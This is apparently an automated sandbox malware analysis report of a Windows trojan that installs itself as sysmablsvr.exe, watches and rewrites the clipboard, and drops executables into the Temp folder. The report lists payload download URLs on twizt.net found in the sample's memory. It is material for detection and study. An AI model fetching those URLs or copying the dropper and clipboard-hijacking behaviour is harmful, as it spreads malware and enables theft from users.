Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->

                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:12:59 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:13:02 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Tue, 17 Sep 2024 21:13:04 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not 
Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                          Source: sysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drString found in binary or memory: http://twizt.net/chnlk20.exe
                          Source: sysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drString found in binary or memory: http://twizt.net/chnlk3.exe
                          Source: sysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drString found in binary or memory: http://twizt.net/chnlk4.exe
                          Source: sysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drString found in binary or memory: http://twizt.net/chnlk5.exe
                          Source: sysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drString found in binary or memory: http://twizt.net/chnlk6.exe
                          Source: sysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drString found in binary or memory: http://twizt.net/chnlk7.exe
                          Source: sysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drString found in binary or memory: http://twizt.net/chnlk8.exe
                          Source: sysmablsvr.exe, 00000001.00000002.4234761224.0000000000870000.00000004.00000020.00020000.00000000.sdmp, 158752420.exe, 00000006.00000000.2344615892.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 158752420.exe, 00000006.00000002.2367197726.00000000006E3000.00000002.00000001.01000000.00000007.sdmp, 259428477.exe, 00000009.00000002.3131562220.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 259428477.exe, 00000009.00000000.3111017919.0000000000A33000.00000002.00000001.01000000.00000009.sdmp, 2958729589.exe, 0000000A.00000002.3841753530.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe, 0000000A.00000000.3820554177.00000000003D3000.00000002.00000001.01000000.0000000A.sdmp, 2958729589.exe.1.dr, 259428477.exe.1.dr, 158752420.exe.1.drString found in binary or memory: http://twizt.net/chnlk9.exe
                          Source: sysmablsvr.exe, 00000001.00000002.4234405265.00000000006C4000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.comicationsapps_16005.11629.20316.0_x64__8wekyb3d8bbwe?ms-resource://microsoft.wi
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004048A0 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,isalpha,isdigit,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard | 0_2_004048A0
                          Source: C:\Windows\sysmablsvr.exe | Code function: 1_2_004048A0 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,isalpha,isdigit,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard | 1_2_004048A0
                          Source: C:\Windows\sysmablsvr.exe | Code function: 2_2_004048A0 lstrlenW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,isalpha,isdigit,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,StrStrW,lstrlenA,GlobalAlloc,GlobalLock,memcpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard | 2_2_004048A0
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00405910 GetWindowLongW,SetClipboardViewer,SetWindowLongW,SetWindowLongW,SendMessageA,IsClipboardFormatAvailable,IsClipboardFormatAvailable,IsClipboardFormatAvailable,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,SendMessageA,RegisterRawInputDevices,ChangeClipboardChain,DefWindowProcA | 0_2_00405910

                          Spam, unwanted Advertisements and Ransom Demands

                          Source: Yara match | File source: file.exe, type: SAMPLE
                          Source: Yara match | File source: 2.0.sysmablsvr.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 1.2.sysmablsvr.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.2.file.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 2.2.sysmablsvr.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 0.0.file.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 1.0.sysmablsvr.exe.400000.0.unpack, type: UNPACKEDPE
                          Source: Yara match | File source: 00000001.00000000.1804968685.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000000.00000000.1784055994.0000000000410000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000002.00000000.1909749196.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000002.00000002.1933493445.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000001.00000002.4234049042.0000000000410000.00000002.00000001.01000000.00000004.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000000.00000002.1815284495.0000000000410000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
                          Source: Yara match | File source: 00000000.00000003.1805000272.0000000000547000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara match | File source: Process Memory Space: file.exe PID: 6672, type: MEMORYSTR
                          Source: Yara match | File source: Process Memory Space: sysmablsvr.exe PID: 6768, type: MEMORYSTR
                          Source: Yara match | File source: Process Memory Space: sysmablsvr.exe PID: 2148, type: MEMORYSTR
                          Source: Yara match | File source: C:\Windows\sysmablsvr.exe, type: DROPPED
                          Source: C:\Windows\sysmablsvr.exe | Process Stats: CPU usage > 49%
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040F669 NtQueryVirtualMemory | 0_2_0040F669
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040DA30 NtQuerySystemTime,RtlTimeToSecondsSince1980 | 0_2_0040DA30
                          Source: C:\Windows\sysmablsvr.exe | Code function: 1_2_0040F669 NtQueryVirtualMemory | 1_2_0040F669
                          Source: C:\Windows\sysmablsvr.exe | Code function: 1_2_0040DA30 NtQuerySystemTime,RtlTimeToSecondsSince1980 | 1_2_0040DA30
                          Source: C:\Windows\sysmablsvr.exe | Code function: 2_2_0040F669 NtQueryVirtualMemory | 2_2_0040F669
                          Source: C:\Windows\sysmablsvr.exe | Code function: 2_2_0040DA30 NtQuerySystemTime,RtlTimeToSecondsSince1980 | 2_2_0040DA30
                          Source: C:\Users\user\Desktop\file.exe | File created: C:\Windows\sysmablsvr.exe
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040F42C | 0_2_0040F42C
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004080D9 | 0_2_004080D9
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00404090 | 0_2_00404090
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040AA90 | 0_2_0040AA90
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004048A0 | 0_2_004048A0
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_004080B0 | 0_2_004080B0
                          Source: C:\Windows\sysmablsvr.exe | Code function: 1_2_0040F42C | 1_2_0040F42C
                          Source: C:\Windows\sysmablsvr.exe | Code function: 1_2_004080D9 | 1_2_004080D9
                          Source: C:\Windows\sysmablsvr.exe | Code function: 1_2_00404090 | 1_2_00404090
                          Source: C:\Windows\sysmablsvr.exe | Code function: 1_2_0040AA90 | 1_2_0040AA90
                          Source: C:\Windows\sysmablsvr.exe | Code function: 1_2_004048A0 | 1_2_004048A0
                          Source: C:\Windows\sysmablsvr.exe | Code function: 1_2_004080B0 | 1_2_004080B0
                          Source: C:\Windows\sysmablsvr.exe | Code function: 2_2_0040F42C | 2_2_0040F42C
                          Source: C:\Windows\sysmablsvr.exe | Code function: 2_2_004080D9 | 2_2_004080D9
                          Source: C:\Windows\sysmablsvr.exe | Code function: 2_2_00404090 | 2_2_00404090
                          Source: C:\Windows\sysmablsvr.exe | Code function: 2_2_0040AA90 | 2_2_0040AA90
                          Source: C:\Windows\sysmablsvr.exe | Code function: 2_2_004048A0 | 2_2_004048A0
                          Source: C:\Windows\sysmablsvr.exe | Code function: 2_2_004080B0 | 2_2_004080B0
                          Source: Joe Sandbox View | Dropped File: C:\Users\user\AppData\Local\Temp\524024912.exe E97496328C0D205A7ECB4ADE75C1555FC7787EC54334468739C5C5CFD6566B3C
                          Source: Joe Sandbox View | Dropped File: C:\Windows\sysmablsvr.exe A992920E64A64763F3DD8C2A431A0F5E56E5B3782A1496DE92BC80EE71CCA5BA
                          Source: file.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                          Source: classification engine | Classification label: mal100.troj.evad.winEXE@12/17@0/87
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00406B50 Sleep,GetModuleFileNameW,GetVolumeInformationW,GetDiskFreeSpaceExW,_aulldiv,wsprintfW,wsprintfW,wsprintfW,Sleep,ExitThread | 0_2_00406B50
                          Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0040E040 SysAllocString,CoCreateInstance,SysFreeString | 0_2_0040E040
                          Source: C:\Windows\sysmablsvr.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\1[1]
                          Source: C:\Windows\sysmablsvr.exe | Mutant created: \Sessions\1\BaseNamedObjects\55a4er5wo
                          Source: C:\Windows\sysmablsvr.exe | File created: C:\Users\user\AppData\Local\Temp\21548511.exe
                          Source: file.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                          Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                          Source: file.exe | ReversingLabs: Detection: 84%
                          Source: C:\Users\user\Desktop\file.exe | File read: C:\Users\user\Desktop\file.exe
                          Source: unknown | Process created: C:\Users\user\Desktop\file.exe "C:\Users\user\Desktop\file.exe"
                          Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\sysmablsvr.exe C:\Windows\sysmablsvr.exe
                          Source: unknown | Process created: C:\Windows\sysmablsvr.exe "C:\Windows\sysmablsvr.exe"
                          Source: C:\Windows\sysmablsvr.exe | Process created: C:\Users\user\AppData\Local\Temp\158752420.exe C:\Users\user\AppData\Local\Temp\158752420.exe
                          Source: C:\Windows\sysmablsvr.exe | Process created: C:\Users\user\AppData\Local\Temp\524024912.exe C:\Users\user\AppData\Local\Temp\524024912.exe
                          Source: C:\Windows\sysmablsvr.exe | Process created: C:\Users\user\AppData\Local\Temp\259428477.exe C:\Users\user\AppData\Local\Temp\259428477.exe
                          Source: C:\Windows\sysmablsvr.exe | Process created: C:\Users\user\AppData\Local\Temp\2958729589.exe C:\Users\user\AppData\Local\Temp\2958729589.exe
                          Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\sysmablsvr.exe C:\Windows\sysmablsvr.exe
                          Source: C:\Windows\sysmablsvr.exe | Process created: C:\Users\user\AppData\Local\Temp\158752420.exe C:\Users\user\AppData\Local\Temp\158752420.exe
                          Source: C:\Windows\sysmablsvr.exe | Process created: C:\Users\user\AppData\Local\Temp\524024912.exe C:\Users\user\AppData\Local\Temp\524024912.exe
                          Source: C:\Windows\sysmablsvr.exe | Process created: C:\Users\user\AppData\Local\Temp\259428477.exe C:\Users\user\AppData\Local\Temp\259428477.exe
